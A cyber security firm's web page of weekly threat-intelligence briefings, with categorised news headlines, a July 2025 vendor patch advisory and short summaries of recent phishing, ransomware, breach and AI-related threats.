SEO Poisoning Campaign Targets 8,500+ SMB Users with Malware Disguised as AI Tools
Weaponized Versions of PuTTY and WinSCP Attacking IT Admins Via Search Results
Malicious Open Source Packages Surge 188% Annually - Infosecurity Magazine
Atomic macOS infostealer adds backdoor for persistent attacks
Chrome Store Features Extension Poisoned With Sophisticated Spyware
Hackers abuse leaked Shellter red team tool to deploy infostealers
Chrome, Edge users infected by 18 malicious extensions | Cybernews
Browser hijacking campaign infects 2.3M Chrome, Edge users • The Register
Russia-linked macOS malware adds dangerous backdoor| Cybernews
200+ browser extensions make a web-scraping botnet | PCWorld
Open source has a malware problem, and it's getting worse - Help Net Security
Bots/Botnets
200+ browser extensions make a web-scraping botnet | PCWorld
Hundreds of DVRs and routers are being hijacked to form another major botnet | TechRadar
Mobile
eSIM Hack Allows for Cloning, Spying - SecurityWeek
How to protect your cell phone number from SIM swap attacks | TechCrunch
The rising threat of mobile malware | Cybernews
Invisible UI flaw gives hackers full Android access | Cybernews
5 critical reasons why keeping your android security updates current is more important than ever
How to detect and fix a jailbroken iPhone | TechTarget
Gemini can access your Android phone's other apps, unless you stop it - here's how | ZDNET
Denial of Service/DoS/DDoS
The DDoS smoke screen: why restoring uptime may be your first mistake | TechRadar
Multiple Apache Tomcat Vulnerabilities Let Attackers Trigger DoS Attacks
Internet of Things – IoT
Hundreds of DVRs and routers are being hijacked to form another major botnet | TechRadar
Millions of Cars Exposed to Remote Hacking via PerfektBlue Attack - SecurityWeek
PerfektBlue Bluetooth attack allows hacking infotainment systems of Mercedes, Volkswagen, and Skoda
Chinese Video Surveillance Vendor Hikvision to Fight Canadian Ban - Infosecurity Magazine
Data Breaches/Leaks
Know Your Enemy: Understanding Dark Market Dynamics
McDonald’s AI Hiring Bot With Password ‘123456’ Leaks Millions of Job-Seekers Data
Hacker leaks Telefónica data allegedly stolen in a new breach
Temporary measures introduced after Glasgow City Council hit by cyber attack | STV News
Bitcoin Depot breach exposes data of nearly 27,000 crypto users
Cyber criminals stealing more data; Privacy watchdog concerned | NL Times
Louis Vuitton says customer data was leaked following cyber attack | TechRadar
Qantas confirms data breach impacts 5.7 million customers
Customer, Employee Data Exposed in Nippon Steel Breach
South Korea Imposes Penalties on SK Telecom for Breach
How Worried Should Consumers Really Be After a Data Breach? - Infosecurity Magazine
Your data privacy is slipping away – here’s why, and what you can do about it
Organised Crime & Criminal Actors
Cyber crime and real-world crime are converging in a dangerous new way – here’s how to stay safe
‘No honour among thieves’: M&S hacking group starts turf war
Know Your Enemy: Understanding Dark Market Dynamics
Cyber criminals stealing more data; Privacy watchdog concerned | NL Times
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
US Secret Service unmasks $400M crypto scam network
Hackers siphon $140M in Central Bank of Brazil attack, converting $40M to crypto | Cryptopolitan
Bitcoin Depot breach exposes data of nearly 27,000 crypto users
Insider Risk and Insider Threats
DOJ Disrupts North Korean IT Worker Schemes Targeting U.S
IT Worker arrested for selling access in $100M PIX cyber heist
Ex-ASML engineer who stole chip tech for Russia gets 3 years • The Register
US airman admits leaking secrets on dating app • The Register
IT worker spared prison for anti-Islam cyber attack on WiFi at UK train stations | The Standard
Insurance
How cyber insurers are stepping up after M&S attack - Insurance Post
Cyber insurance confronts the age of intelligent threats | Insurance Business America
Supply Chain and Third Parties
Financial firms are locking the front door but leaving the back open - Help Net Security
Get ahead of third-party risk or wave goodbye to your cyber resilience | TechRadar
Global software supply chain visibility remains critically low - Help Net Security
MSPs Under More Scrutiny From Customers on Cyber Than Ever - IT Security Guru
Pressure mounts on MSPs as enterprises flock to managed cyber security services | ChannelPro
Cloud/SaaS
What Security Leaders Need to Know About AI Governance for SaaS
Google Cloud keeps AI data in UK, but not the support • The Register
Cloud security maintains its position as top spending priority - Help Net Security
Outages
Microsoft Outlook goes down around the world - here's what we know | ZDNET
Identity and Access Management
Identity attacks surge 156% as phishermen get craftier • The Register
Identity-related cyber incidents surge, report finds | SC Media
Is the UK falling behind Europe on digital identity security? | Biometric Update
Encryption
EU Launches Plan to Implement Quantum-Secure Infrastructure - Infosecurity Magazine
Linux and Open Source
Malicious Open Source Packages Surge 188% Annually - Infosecurity Magazine
Open source has a malware problem, and it's getting worse - Help Net Security
New Linux Security Flaw Can Bypass Disk Encryption - OMG! Ubuntu
SUSE launches new European digital sovereignty support service to meet surging demand | ZDNET
Passwords, Credential Stuffing & Brute Force Attacks
McDonald’s AI Hiring Bot With Password ‘123456’ Leaks Millions of Job-Seekers Data
How passkeys work: Do your favorite sites even support passkeys? | ZDNET
How passkeys work: The complete guide to your inevitable passwordless future | ZDNET
Social Media
TikTok’s Handling of EU User Data in China Comes Under Scrutiny Again - Infosecurity Magazine
Tribunal Ruling Brings ICO’s £12.7m TikTok Fine Closer - Infosecurity Magazine
Regulations, Fines and Legislation
NIS2 Explained: An EU Directive For Secure Networked Systems - EE Times
NIS 2: Strengthening Europe’s Cyber Defences | Morrison & Foerster LLP - JDSupra
Czech Republic in Finale of NIS 2 Transposition
EU Launches Plan to Implement Quantum-Secure Infrastructure - Infosecurity Magazine
South Korea Imposes Penalties on SK Telecom for Breach
What CISOs Need to Know About AI Governance Frameworks | TechTarget
CISOs urged to fix API risk before regulation forces their hand - Help Net Security
US Cyber Security at Risk Without Congressional Action
Trump seeks unprecedented $1.23 billion cut to federal cyber budget | CSO Online
Models, Frameworks and Standards
NIS2 Explained: An EU Directive For Secure Networked Systems - EE Times
NIS 2: Strengthening Europe’s Cyber Defences | Morrison & Foerster LLP - JDSupra
Czech Republic in Finale of NIS 2 Transposition
Why law firms should get LOCS:23 certified - Legal Futures
Data Protection
TikTok’s Handling of EU User Data in China Comes Under Scrutiny Again - Infosecurity Magazine
Tribunal Ruling Brings ICO’s £12.7m TikTok Fine Closer - Infosecurity Magazine
Your data privacy is slipping away – here’s why, and what you can do about it
Careers, Working in Cyber and Information Security
Cyber security’s mental health reckoning - Tech Monitor
Why your security team feels stuck - Help Net Security
Will AI Gut the Cyber Security Talent Pipeline?
Hiring trends report | Professional Security Magazine
How to Get a Job in Cyber Security | The Global Recruiter
Law Enforcement Action and Take Downs
Four arrested in connection with M&S and Co-op cyber attacks - BBC News
Teens arrested by NCA over cyber attacks on M&S, Harrods and Co-op
US Secret Service unmasks $400M crypto scam network
Alleged Chinese hacker tied to Silk Typhoon arrested for cyberespionage
Suspected Hacker Linked to Silk Typhoon Arrested in Milan
Ex-ASML engineer who stole chip tech for Russia gets 3 years • The Register
US airman admits leaking secrets on dating app • The Register
French cops cuff Russian hoopster for alleged ransomware • The Register
Is This Russian Basketball Player Part of a Ransomware Gang?
IT worker spared prison for anti-Islam cyber attack on WiFi at UK train stations | The Standard
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Alleged Chinese hacker tied to Silk Typhoon arrested for cyber espionage
Businesses at greater risk of cyber attack due to geopolitical tensions - Verdict
UK and France unite against increasing cyber threats
Even children can help counter threats bringing ‘war to our doorstep’, MPs say | The Independent
Grey zone attacks are bringing conflict to Britain’s doorstep — it’s time we woke up to... - LBC
Whole of society must respond to threats bringing ‘war to the doorstep’, MPs say
Teach children how to catch Russian spies online, MPs told
Hostile activities bring war to the doorstep of each and every one of us, new report warns
Nation State Actors
China
Alleged Chinese hacker tied to Silk Typhoon arrested for cyberespionage
Suspected Hacker Linked to Silk Typhoon Arrested in Milan
North American APT Uses Exchange Zero-Day to Attack China
TikTok’s Handling of EU User Data in China Comes Under Scrutiny Again - Infosecurity Magazine
Tribunal Ruling Brings ICO’s £12.7m TikTok Fine Closer - Infosecurity Magazine
Chinese Video Surveillance Vendor Hikvision to Fight Canadian Ban - Infosecurity Magazine
Taiwan Flags Chinese Apps Over Data Security Violations - Infosecurity Magazine
Taiwan NSB Alerts Public on Data Risks from TikTok, Weibo, and RedNote Over China Ties
Chinese State-Sponsored Hacker Charged Over COVID-19 Research Theft - Infosecurity Magazine
NightEagle APT Exploits Microsoft Exchange Flaw to Target China's Military and Tech Sectors
Russia
Even children can help counter threats bringing ‘war to our doorstep’, MPs say | The Independent
Teach children how to catch Russian spies online, MPs told
Russia-linked macOS malware adds dangerous backdoor| Cybernews
Russia Launches Spy Ship to Target NATO Undersea Cables — UNITED24 Media
Survey: war, cyber attacks top security concerns; support for European cooperation grows | NL Times
Ex-ASML engineer who stole chip tech for Russia gets 3 years • The Register
US airman admits leaking secrets on dating app • The Register
French cops cuff Russian hoopster for alleged ransomware • The Register
A Clever Russian Phishing Attack Using Fake State Department Employees
Looking Tough: Russia Trumpets Pro-Ukraine Hacker Arrests
Russia rejects ethical hacking bill • The Register
Spyware Campaign Hits Russian Industrial Firms
Russian airports crippled as 171 Moscow flights canceled
Researchers Uncover Batavia Windows Spyware Stealing Documents from Russian Firms
Iran
UK faces rising and unpredictable threat from Iran, report warns
Rising threat of assassination and kidnap attempts by Iran in UK – Channel 4 News
Iranian ransomware crew promises big bucks for US attacks • The Register
Iranian ransomware crew promises big bucks for US attacks • The Register
Missiles go silent but Iran-Israel cyber war is just ramping up | Iran International
The Iran-Israel War Returns to the Shadows, for Now
North Korea
DOJ Disrupts North Korean IT Worker Schemes Targeting U.S
US sanctions alleged North Korean IT sweatshop leader • The Register
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
DoNot APT is expanding scope targeting European foreign ministries
TAG-140 Deploys DRAT V2 RAT, Targeting Indian Government, Defence, and Rail Sectors
Tools and Controls
FBI Warns Hackers Are Exploiting Remote Desktop Protocol (RDP)
The Cost of Unpreparedness: Why Many Businesses Lack a Continuity Strategy | Entrepreneur
The MFA You Trust Is Lying to You – and Here's How Attackers Exploit It
Technology outpaces security adaptation, says Bitdefender
Many companies are still failing to budget for cyber security | TechRadar
LLMs Fall Short in Vulnerability Discovery and Exploitation - Infosecurity Magazine
Vibe Hacking Not Yet Possible - InfoRiskToday
CISOs urged to fix API risk before regulation forces their hand - Help Net Security
MSPs Under More Scrutiny From Customers on Cyber Than Ever - IT Security Guru
Hackers abuse leaked Shellter red team tool to deploy infostealers
AI built it, but can you trust it? - Help Net Security
Will AI Gut the Cyber Security Talent Pipeline?
How passkeys work: The complete guide to your inevitable passwordless future | ZDNET
Cloud security maintains its position as top spending priority - Help Net Security
Cyber insurance confronts the age of intelligent threats | Insurance Business America
PayPal's AI-powered scam alert system might intercept your transactions now - here's why | ZDNET
Other News
Data sovereignty is now a cyber security imperative - Tech Monitor
FBI Warns Hackers Are Exploiting Remote Desktop Protocol (RDP)
Technology outpaces security adaptation, says Bitdefender
Survey: war, cyber attacks top security concerns; support for European cooperation grows | NL Times
SMEs warned of 'serious consequences' if not prepared for cyber attacks | Insurance Times
Cyber attacks could exploit home solar panels to disrupt power grids | New Scientist
Vulnerability Management
LLMs Fall Short in Vulnerability Discovery and Exploitation - Infosecurity Magazine
Vibe Hacking Not Yet Possible - InfoRiskToday
End of life for Microsoft Office puts malicious macros in the security spotlight | CSO Online
5 critical reasons why keeping your android security updates current is more important than ever
Vulnerabilities
Microsoft Patches 130 Vulnerabilities, Including Critical Flaws in SPNEGO and SQL Server
End of life for Microsoft Office puts malicious macros in the security spotlight | CSO Online
Invisible UI flaw gives hackers full Android access | Cybernews
Ivanti, Fortinet, Splunk Release Security Updates - SecurityWeek
AMD warns of new Meltdown, Spectre-like bugs affecting CPUs • The Register
New Linux Security Flaw Can Bypass Disk Encryption - OMG! Ubuntu
Multiple Apache Tomcat Vulnerabilities Let Attackers Trigger DoS Attacks
CISA Adds Four Critical Vulnerabilities to KEV Catalog Due to Active Exploitation
ServiceNow Flaw CVE-2025-3648 Could Lead to Data Exposure via Misconfigured ACLs
Millions of Cars Exposed to Remote Hacking via PerfektBlue Attack - SecurityWeek
Microsoft Confirms Windows 11 Update Causes Security Firewall Error
Unpatched Ruckus Vulnerabilities Allow Wireless Environment Hacking - SecurityWeek
Critical mcp-remote Vulnerability Enables Remote Code Execution, Impacting 437,000+ Downloads
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Advisory 09 July 2025 – Security Updates from Microsoft, Ivanti, Fortinet, Splunk, Adobe, and SAP
Black Arrow Cyber Advisory 09 July 2025 – Security Updates from Microsoft, Ivanti, Fortinet, Splunk, Adobe, and SAP
Executive Summary
Microsoft’s July 2025 Patch Tuesday addressed 137 vulnerabilities, including a publicly disclosed zero-day in SQL Server, 14 critical issues (primarily remote code execution) in Office and Windows components, and a range of privilege escalation, information disclosure, denial-of-service, and spoofing flaws affecting Office and Office Components, .NET and Visual Studio, Azure, Teams, Hyper-V, Windows BitLocker, Microsoft Edge (Chromium-based), and the Windows Cryptographic Service.
Ivanti released advisory AV25‑405 on 8 July, fixing 11 vulnerabilities across Connect Secure (ICS), Policy Secure (IPS), Endpoint Manager (EPM), and Endpoint Manager Mobile (EPMM), including high-severity flaws that impact authentication, credential decryption, and OS command injection.
Fortinet published eight security advisories covering one critical, one high, five medium, and one low severity vulnerabilities affecting FortiAnalyzer, FortiProxy, FortiOS, FortiSandbox, FortiVoice, and FortiWeb.
Splunk this week issued 12 advisories that resolve critical and high-severity flaws in third-party dependencies in Splunk SOAR, Enterprise, and DB Connect. Additionally, the company announced fixes for seven medium- and one low-severity issue in Splunk Enterprise.
Adobe announced the rollout of security fixes for 58 vulnerabilities across 13 products, including three critical-severity flaws in Adobe Connect, ColdFusion, and Experience Manager Forms (AEM Forms) on JEE.
SAP announced the release of 27 new and four updated security notes as part of its July 2025 Security Patch Day, including six that address critical vulnerabilities.
What’s the risk to me or my business?
This month’s releases cover major vendor ecosystems and include both publicly disclosed and critical vulnerabilities. Unpatched systems are vulnerable to SQL Server information disclosure, Office/Windows RCEs, credential decryption in Ivanti, command injection in Fortinet devices, package-level compromises in Splunk SOAR, Adobe application attacks, and insecure deserialization in SAP, which can lead to full system compromise or data breaches.
What can I do?
Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation's security policies and ensure that all systems are running supported and up-to-date software versions.
Microsoft
Further details on specific updates within this Microsoft patch Tuesday can be found here:
https://msrc.microsoft.com/update-guide/releaseNote/2025-Jul
Ivanti, Fortinet, Splunk, Adobe, SAP
Further details of the vulnerabilities in affected Ivanti, Fortinet, Splunk, Adobe, SAP products:
https://www.ivanti.com/blog/july-security-update-2025
https://www.fortiguard.com/psirt
https://advisory.splunk.com/advisories/SVD-2025-0712
https://helpx.adobe.com/security.html
https://support.sap.com/en/my-support/knowledge-base/security-notes-news/july-2025.html
#threatadvisory #threatintelligence #cybersecurity
Black Arrow Cyber Threat Intelligence Briefing 04 July 2025
Black Arrow Cyber Threat Intelligence Briefing 04 July 2025:
-Hackers Using PDFs to Impersonate Microsoft, DocuSign, and More in Callback Phishing Campaigns
-You Can’t Trust AI Chatbots Not to Serve You Phishing Pages or Malicious Downloads
-90% Aren’t Ready for AI Attacks, Are You?
-Over 1,000 Small Office Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
-Qantas Confirms Cyber Attack Exposed Records of Up to 6 Million Customers
-Third-Party Breaches Double, Creating Ripple Effects Across Industries
-Automation and Vulnerability Exploitation Drive Mass Ransomware Breaches
-A Group of Young Cyber Criminals Poses the ‘Most Imminent Threat’ of Cyber Attacks Right Now
-Scam Centres Expand Global Footprint with Trafficked Victims
-The SMB Wake-Up Call: Downtime, Dollars, and Data Loss
-Many Global Execs Identify Cyber Risk as Top Concern, Beazley
-Cyber Security is a Boardroom Imperative: New Data Reveals Urgency for Proactive Defence
-Rethinking Cyber Risk as Traditional Models Fall Short
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
This week, we begin our review with details of evolving cyber attacks that organisations should address in managing their risks. Attackers are impersonating trusted brands through phishing emails containing PDF attachments and phone numbers for fake support centres, while others are targeting the routers used in homes and small offices. The cyber risks of using AI are also developing, including AI chatbots that present malicious links to users. Attackers are successfully gaining access to victims’ data and systems through third parties the victims work with, such as the recently disclosed attack at Qantas.
We share details of other attack tactics, including those used by the highly active Scattered Spider group, the emerging of scam centres located around the world, and the use of automated scanning and mass exploitation of security flaws. We conclude with the perspective of business leaders, noting a sharp rise in executives naming cyber risk as their main concern, as over 60% of UK organisations are affected by incidents.
We find that a key element of successful cyber security begins with a leadership team that understands and is confident in managing their own cyber risks. This requires a boardroom-level conversation on contemporary cyber risks and how to govern them proportionately. Contact us for details of our Senior Leadership Risk and Governance Workshops.
Top Cyber Stories of the Last Week
Hackers Using PDFs to Impersonate Microsoft, DocuSign, and More in Callback Phishing Campaigns
Cyber security experts have uncovered phishing campaigns using fake emails with PDF attachments to impersonate trusted brands like Microsoft and DocuSign. These emails coax victims into scanning QR codes or calling fake support numbers, leading to credential theft or malware installation. Attackers exploit the trust placed in phone calls and use scripted tactics to appear legitimate. Additionally, criminals are manipulating artificial intelligence responses and compromising reputable websites to direct users to malicious sites. These developments highlight how cyber criminals are combining social engineering with new technologies to broaden their attacks and undermine brand trust.
https://thehackernews.com/2025/07/hackers-using-pdfs-to-impersonate.html
You Can’t Trust AI Chatbots Not to Serve You Phishing Pages or Malicious Downloads
Researchers have found that popular AI chatbots increasingly risk steering users to harmful websites, including phishing pages and malicious downloads. In a recent test, chatbots gave incorrect or unsafe login links 34% of the time, creating opportunities for attackers to hijack unclaimed web domains. Criminals are actively crafting convincing fake websites and content to manipulate AI-generated answers, making malicious sites appear trustworthy. As people rely more on chatbots instead of search engines, there is a growing danger that AI tools could unknowingly enable large-scale cyber attacks by providing users with fraudulent or unsafe information.
90% Aren’t Ready for AI Attacks, Are You?
Accenture’s latest report warns that 90% of organisations are unprepared to secure their AI-driven operations, with 63% stuck in an “Exposed Zone” lacking effective cyber security strategies and technical skills. As AI adoption accelerates, most firms have not implemented essential security practices, with only 22% providing policies or training for AI use and just 25% applying strong data protection measures. The research highlights that embedding cyber security from the outset is critical, as organisations with mature defences are significantly more effective at blocking advanced threats and maintaining customer trust.
https://www.helpnetsecurity.com/2025/07/03/ai-cyber-defenses/
Over 1,000 Small Office Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
Security researchers have uncovered a network of over 1,000 hacked small office and home office (SOHO) devices, known as LapDogs, which has been used in cyber espionage linked to Chinese hacking groups. The campaign targets organisations in the United States, Southeast Asia, Japan, and Taiwan, including firms in IT, real estate, and media. Attackers deploy a backdoor called ShortLeash to compromise devices and disguise their activities. Evidence suggests the campaign has been active since late 2023, with batches of attacks infecting up to 60 devices at a time, highlighting rising risks to businesses relying on poorly secured internet-connected equipment.
https://thehackernews.com/2025/06/over-1000-soho-devices-hacked-in-china.html
Qantas Confirms Cyber Attack Exposed Records of Up to 6 Million Customers
Qantas has confirmed a cyber attack on a third-party platform used by its call centre, potentially exposing personal data of up to 6 million customers. Information such as names, contact details, birth dates and frequent flyer numbers was compromised, though financial details and passwords remain secure. The airline quickly contained the breach and is working with cyber security experts. Authorities including the Australian Cyber Security Centre have been notified. This incident highlights the rising trend of cyber attacks in Australia, where reported data breaches increased by 25% in 2024, with most caused by malicious activity such as phishing and ransomware.
Third-Party Breaches Double, Creating Ripple Effects Across Industries
A recent report highlights that breaches involving suppliers have doubled to nearly 30%, exposing a dangerous reliance on a small group of technology providers whose compromise can disrupt thousands of organisations. Despite this rising threat, many firms still rely on outdated approaches like self-assessment questionnaires, with 62% admitting that most of their suppliers do not meet their own cyber security standards. Overstretched security teams struggle to monitor these risks effectively, and without proactive incident response plans across supply chains, organisations remain vulnerable to cascading impacts from third-party cyber attacks.
https://www.helpnetsecurity.com/2025/06/30/supply-chain-cyber-risks/
Automation and Vulnerability Exploitation Drive Mass Ransomware Breaches
ReliaQuest has highlighted how ransomware groups are increasingly using automated scanning and mass exploitation of security flaws to breach organisations, with Qilin and Akira among those rapidly expanding attacks in early 2025. Poorly managed or unknown systems are prime targets, as they often remain unpatched for weeks after fixes are released, giving criminals time to automate attacks. The UK’s National Cyber Security Centre has warned that artificial intelligence will further accelerate cyber attacks by shortening the time between discovery of a weakness and its exploitation, while phishing remains a growing entry point with ransomware-linked phishing rising by 58% late last year.
https://www.infosecurity-magazine.com/news/automation-vulnerability/
A Group of Young Cyber Criminals Poses the ‘Most Imminent Threat’ of Cyber Attacks Right Now
Scattered Spider, a group of young cyber criminals, has re-emerged as a major threat to critical services including retailers, insurers, and airlines in the UK, US, and Canada. Using tactics like tricking IT staff into giving system access, they breach networks to install ransomware or steal data for extortion. Despite arrests last year, their recent surge highlights their adaptability and skill at exploiting gaps in security processes. Law enforcement and researchers warn that their loosely connected structure makes them difficult to disrupt, posing an imminent risk to organisations reliant on digital systems.
https://www.wired.com/story/scattered-spider-most-imminent-threat/
Scam Centres Expand Global Footprint with Trafficked Victims
Interpol has highlighted that online scam centres, previously concentrated in Southeast Asia, are now emerging globally, including in West Africa, Central America and the Middle East. Criminals lure victims from 66 countries with fake job offers, trafficking them into compounds where they are forced to run scams such as romance fraud. Interpol estimates hundreds of thousands are trapped in this way, often facing violence and exploitation. The increasing use of artificial intelligence to craft convincing adverts and scam profiles is worsening the threat, demanding urgent coordinated international action with scam centres making an estimated $37bn last year.
https://www.infosecurity-magazine.com/news/scam-centers-global-footprint/
The SMB Wake-Up Call: Downtime, Dollars, and Data Loss
Nearly three quarters of small and medium-sized businesses suffered a data breach or cyber attack in 2023, yet many remain overconfident in their ability to recover. In a recent report, 85% of leaders believe they could bounce back, yet fewer than a third have robust security measures in place. Downtime can cost SMBs up to $427 (£313) per minute, threatening revenue and eroding customer trust. Attackers are increasingly using artificial intelligence to target vulnerabilities. It is vital for SMBs to implement tested recovery plans, clear crisis procedures, and regular data backups to minimise disruption and protect their reputation in an evolving threat landscape.
https://www.msspalert.com/perspective/the-smb-wake-up-call-downtime-dollars-and-data-loss
Many Global Execs Identify Cyber Risk as Top Concern, Beazley
Beazley’s latest report reveals a sharp rise in executives naming cyber risk as their main worry, climbing to 29% in 2025 from 26% the year before. Beazley suggests that executives are underestimating today’s unpredictable cyber risks exemplified by recent high profile attacks on major retailers. Risks include cyber warfare, third-party weaknesses, and the use of artificial intelligence to enhance ransomware attacks. While most organisations plan to boost cyber security with external experts and increased internal investment, Beazley warns that regulatory and operational challenges could undermine these efforts, leaving a dangerous gap between awareness and true readiness.
Cyber Security is a Boardroom Imperative: New Data Reveals Urgency for Proactive Defence
Recent findings show cyber attacks are causing severe business disruption, with 62% of UK organisations hit by such incidents experiencing downtime and 54% facing ransom demands. Losses from recent attacks on major retailers may exceed £440 million, highlighting the rising costs and reputational risks. As attacks become more advanced and regulators demand stronger oversight, boards must treat cyber security as a critical business issue. Continuous testing of systems using real-world attack techniques is recommended to uncover vulnerabilities proactively, helping organisations strengthen their defences and meet growing expectations for responsible cyber risk management.
Rethinking Cyber Risk as Traditional Models Fall Short
Traditional models for assessing cyber risk are struggling to keep pace with modern threats as organisations become more interconnected and attackers more sophisticated. Current methods often overlook supply chain weaknesses and everyday threats that can cause serious disruptions, focusing instead on outdated scenarios or only the largest vendors. Experts are calling for more proactive, data-driven approaches that consider overlooked suppliers, economic impacts, and the growing use of remote working.
https://www.darkreading.com/cyber-risk/rethinking-cyber-risk-traditional-models-fall-short
Governance, Risk and Compliance
10 tough cyber security questions every CISO must answer | CSO Online
Reputation Risk Can Overshadow Ransom in Cyber Attacks, Aon Says
CISOs must rethink defence playbooks as cyber criminals move faster, smarter | CSO Online
Rethinking Cyber Risk as Traditional Models Fall Short
Many global execs identify cyber risk as top concern -- Beazley | Insurance Business America
Cyber Security is a Boardroom Imperative: New Data Reveals Urgency for Proactive Defence | Pressat
Beazley Report: Executives Misjudge Cyber Preparedness
The CISO evolution: From security gatekeeper to strategic leader | TechTarget
How CISOs Can Manage and Reduce Compliance Fatigue
Coalition: SMB Threat Awareness is High, but Security Spending Is Not | MSSP Alert
The SMB Wake-Up Call: Downtime, Dollars, and Data Loss | MSSP Alert
Threats
Ransomware, Extortion and Destructive Attacks
A Group of Young Cyber Criminals Poses the ‘Most Imminent Threat’ of Cyber Attacks Right Now | WIRED
Reputation Risk Can Overshadow Ransom in Cyber Attacks, Aon Says
Inside Scattered Spider: The notorious teen hackers causing chaos online | The Independent
Ransomware Reshaped How Cyber Insurers Perform Security Assessments
Automation and Vulnerability Exploitation Drive Mass Ransomware Breach - Infosecurity Magazine
KnowBe4 Urges Organisations to Recognize Social Engineering's Critical Role in Ransomware Surge
SafePay Ransomware: What You Need To Know | Fortra
The FBI warns that Scattered Spider is now targeting the airline sector
RansomHub Ransomware Attacking RDP Servers Using Mimikatz and Advanced IP Scanner Tools
Hawaiian Airlines Hacked as Aviation Sector Warned of Scattered Spider Attacks - SecurityWeek
FBI Issues Warning After Hackers Breach Major US Airlines | Rock Hill Herald
Nearly half of ransomware victims still pay out, says Sophos • The Register
Hunters International ransomware shuts down, releases free decryptors
Cl0p data exfiltration tool found vulnerable to RCE attacks • The Register
Ransomware Victims
Scattered Spider Taps CFO Account in 'Scorched Earth' Breach
Teardown: How Scattered Spider Hacked a Logistics Firm
Radix cyber attack: Swiss federal data at risk | Cybernews
M&S will be over the worst of cyber attack impact by August, says CEO | Reuters
The Same Cyber Hacking Group Breached 3 Airlines In 3 Weeks
FBI Issues Warning After Hackers Breach Major US Airlines | Rock Hill Herald
Humac Apple reseller targeted by Kraken ransomware | Cybernews
People warned to watch out for scam emails following cyber attack on M&S | The Standard
IdeaLab confirms data stolen in ransomware attack last year
Phishing & Email Based Attacks
71% of new hires click on phishing emails within 3 months - Help Net Security
KnowBe4 Urges Organisations to Recognize Social Engineering's Critical Role in Ransomware Surge
Hackers Using PDFs to Impersonate Microsoft, DocuSign, and More in Callback Phishing Campaigns
ChatGPT creates phisher’s paradise by serving wrong URLs • The Register
Like SEO, LLMs May Soon Fall Prey to Phishing Scams
Hackers use Vercel's generative AI development tool to create phishing sites
Criminals Sending QR Codes in Phishing, Malware Campaigns
Why 95% of phishing attacks go unreported in healthcare | TechRadar
Russian APT 'Gamaredon' Hits Ukraine With Fierce Phishing
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Other Social Engineering
KnowBe4 Urges Organisations to Recognize Social Engineering's Critical Role in Ransomware Surge
US shuts down a string of North Korean IT worker scams • The Register
50 customers of French bank hit after insider helped SIM swap scammers
Scope, Scale of Spurious North Korean IT Workers Emerges
Fraud, Scams and Financial Crime
Scam Centres Expand Global Footprint with Trafficked Victims - Infosecurity Magazine
People warned to watch out for scam emails following cyber attack on M&S | The Standard
Patients, providers duped in records-and-payment scam • The Register
ESET Warns of NFC Data for Contactless Payments Emerges as Cyber Crime Target
International Taskforce Dismantles €460m Crypto Fraud Network - Infosecurity Magazine
Police dismantles investment fraud ring stealing €10 million
Glasgow council parking scam messages warning amid cyber incident | The National
Lazarus Group strikes again in $3.2M Solana heist | Cryptopolitan
FBI: Cyber criminals steal health data posing as fraud investigators
Scammers are tricking travelers into booking trips that don't exist - Help Net Security
Artificial Intelligence
90% aren't ready for AI attacks, are you? - Help Net Security
Like SEO, LLMs May Soon Fall Prey to Phishing Scams
Hackers use Vercel's generative AI development tool to create phishing sites
Cyber criminals are abusing LLMs to help them with hacking activities | TechRadar
Are we securing AI like the rest of the cloud? - Help Net Security
AI cyber security readiness remains low globally as 90% of firms face elevated threat risks
Germany asks Google, Apple to remove DeepSeek AI from app stores
The Rise of Agentic AI: Uncovering Security Risks in AI Web Agents - Security Boulevard
AI on the Frontline: Global Firms Back Innovation, Brace for New Cyber Threats
How cyber criminals are weaponizing AI and what CISOs should do about it - Help Net Security
Cloudflare declares war on AI crawlers - and the stakes couldn't be higher | ZDNET
Malware
Criminals Sending QR Codes in Phishing, Malware Campaigns
GIFTEDCROOK Malware Evolves: From Browser Stealer to Intelligence-Gathering Tool
Chinese Group Silver Fox Uses Fake Websites to Deliver Sainbox RAT and Hidden Rootkit
AsyncRAT Campaign Continues to Evade Endpoint Detection | MSSP Alert
SMBs are being hit by malicious productivity tools – Zoom and ChatGPT spoofed by hackers | TechRadar
Over 40 Malicious Firefox Extensions Target Cryptocurrency Wallets, Stealing User Assets
North Korean Hackers Target Crypto Firms with Novel macOS Malware - Infosecurity Magazine
North Korean Hackers Target Web3 with Nim Malware and Use ClickFix in BabyShark Campaign
Mobile
Germany asks Google, Apple to remove DeepSeek AI from app stores
50 customers of French bank hit after insider helped SIM swap scammers
Google hit with $314m fine for collecting data from idle Android phones without permission
Denial of Service/DoS/DDoS
Cloudflare blocks largest DDoS attack - here's how to protect yourself | ZDNET
Internet of Things – IoT
Over 1,000 SOHO Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
Smart Tractors Vulnerable to Full Takeover
